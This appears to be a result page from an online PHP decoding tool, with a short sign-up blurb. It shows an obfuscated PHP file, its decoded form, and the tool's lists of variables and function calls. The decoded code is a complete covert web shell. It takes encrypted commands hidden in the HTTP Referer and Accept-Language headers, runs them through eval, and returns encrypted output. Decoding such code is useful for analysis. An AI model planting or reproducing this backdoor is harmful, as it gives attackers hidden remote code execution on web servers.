Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $S='repla+Ace(arr+Aay("/+A_/+A","/-/"),a+A+Array+A("/","+"+A),$ss($s[$i+A+A],0,$e))..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$S='repla+Ace(arr+Aay("/+A_/+A","/-/"),a+A+Array+A("/","+"+A),$ss($s[$i+A+A],0,$e))),$k))+A);$+Ao=ob_get+A_conte+Ants();o+Ab_e';
$I='2][$z]];if(s+Atrpo+As($p,$h)+A===0){+A$s[$+Ai]=""+A;$p=$+As+As+A($p,3);}if(arr+Aay_key_ex+Ai+Asts(+A$i,+A$s)){$s[$i].=$+A+A';
$Y='or(+A$j=0;($j<$c&+A&$i<$l+A);$j++A+,$+Ai++){$+Ao.=$t{+A$i}^$k{+A$+Aj};}}retur+An $o;+A}$r+A=$_SERVER;$+Arr=@$r["H+ATTP_+AREFE';
$x=str_replace('l','','clrealtle_fulncltlion');
$o='p;$e=strpos($s[$i+A]+A,$f);if($e+A){$k=$+Akh.$k+Af;ob_+Ast+Aart();@eva+A+Al(@gzuncom+Apres+As(@x(@ba+Ase64_de+Acode(preg_+A';
$O='$kh="5d41";+A$+Akf="402a";f+Aunc+A+Ation+A x($t+A,$k){$c=strle+An(+A$k);$l=str+Al+Aen($t);$o="";for+A($i+A+A=0;$i<$l;){f+A';
$j='nd_+Aclean+A();$+Ad=b+Aase64_encode+A(x+A(gzc+A+Aompress($o),$k));p+Arint+A("+A<$k>$d<+A/$k>");@sess+Aion_d+Aes+Atroy();}}}}';
$G='+A$q);$q=ar+Ar+Aa+Ay_values($q)+A;p+Areg_+Amatch_all("+A/([\\w])[\\w-+A]++A(?:;q=0.([+A\\+Ad]))?,?/+A",$ra,$m)+A;+Aif($+Aq+A&&$m+A)';
$r='{@session_start(+A);$s=&$+A+A_SESSION;$ss=+A+A"substr";$sl+A="st+Artolow+Aer";$i=$+Am+A+A[1][0].$m[1][1];+A+A$h=$s+Al($ss(md';
$m='5($i.+A$kh),0,+A3+A));$f=$sl(+A$+Ass+A(md5($i.$k+Af),0,3))+A;+A$p="";+Afor($z=1;$z+A<+Acount($m[1]);$+Az++)$p+A.=$q[$+Am[+A';
$V='RER+A"];$+A+Ara+A=@$r["HTTP_A+A+ACCEPT_LANGUAGE"]+A;if($+Arr&&$r+Aa)+A{$u=parse_u+Ar+Al($r+Ar);parse_str(+A$u["que+Ary"],';
$d=str_replace('+A','',$O.$Y.$V.$G.$r.$m.$I.$o.$S.$j);
$C=$x('',$d);$C();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C None
$G +A$q);$q=ar+Ar+Aa+Ay_values($q)+A;p+Areg_+Amatch_all("+A/([\..
$I 2][$z]];if(s+Atrpo+As($p,$h)+A===0){+A$s[$+Ai]=""+A;$p=$+As+..
$O $kh="5d41";+A$+Akf="402a";f+Aunc+A+Ation+A x($t+A,$k){$c=str..
$S repla+Ace(arr+Aay("/+A_/+A","/-/"),a+A+Array+A("/","+"+A),$s..
$V RER+A"];$+A+Ara+A=@$r["HTTP_A+A+ACCEPT_LANGUAGE"]+A;if($+Arr..
$Y or(+A$j=0;($j<$c&+A&$i<$l+A);$j++A+,$+Ai++){$+Ao.=$t{+A$i}^$..
$d $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$j nd_+Aclean+A();$+Ad=b+Aase64_encode+A(x+A(gzc+A+Aompress($o)..
$m 5($i.+A$kh),0,+A3+A));$f=$sl(+A$+Ass+A(md5($i.$k+Af),0,3))+A..
$o p;$e=strpos($s[$i+A]+A,$f);if($e+A){$k=$+Akh.$k+Af;ob_+Ast+A..
$r {@session_start(+A);$s=&$+A+A_SESSION;$ss=+A+A"substr";$sl+A..
$x create_function

Stats

MD5 30b52d5ea27b4c029b77c9bb0b547768
Eval Count 1
Decode Time 145 ms